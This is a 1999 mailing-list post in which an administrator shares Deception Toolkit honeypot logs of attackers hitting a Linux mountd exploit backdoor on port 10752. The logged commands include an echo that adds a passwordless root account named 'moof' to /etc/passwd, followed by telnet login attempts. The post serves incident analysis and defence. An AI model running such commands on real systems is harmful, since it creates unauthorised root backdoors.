Firewall Wizards mailing list archives

RE: Port 10752?

From: "Frank W. Keeney" <FKeeney () hsa com>
Date: Wed, 24 Mar 1999 08:27:10 -0800

Thank you. I run the Deception Toolkit on one of my hosts to make it
appear vulnerable to mountd exploits. I started seeing attempts at 10752
so I created a port 10752 deception. A few days ago I logged this:

Hostname and ip addresses removed for obvious reasons:

Commands to port 10752:

S0  Init
S0  trap '' SIGALRM SIGTRAP
S0  PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0  /usr/sbin/rpc.mountd </dev/null
S0  /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'

/etc/passwd


Attempts to telnet using moof username:

S0
S0  moof
S0  mooof
S0  moof
S0  moof
S0  moof
S0  moof
S0  moof
S0  moof

Another try:

S0  Init
S0  trap '' SIGALRM SIGTRAP
S0  PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH
S0  /usr/sbin/rpc.mountd </dev/null
S0  /bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash'

/etc/passwd

S0  ChildSignal ALRM

More attempts to telnet using moof username:

S0
S0  moof



        ----------
        From:  Vern Paxson [SMTP:vern () ee lbl gov]
        Sent:  Tuesday, March 23, 1999 8:28 PM
        To:  Frank W. Keeney
        Cc:  firewall-wizards () nfr net
        Subject:  Re: Port 10752?

        > What is Port 10752?
        > 
        > I've been scanned several times from different locations for
this port
        > number.

        It's a backdoor.  In particular, that's the port that one of the
Linux
        mountd overflow exploits runs its backdoor on if it succeeds.

Current thread:

Port 10752? Frank W. Keeney (Mar 23)
- Re: Port 10752? Darren Reed (Mar 24)
- <Possible follow-ups>
- Re: Port 10752? Vern Paxson (Mar 24)
- RE: Port 10752? Frank W. Keeney (Mar 24)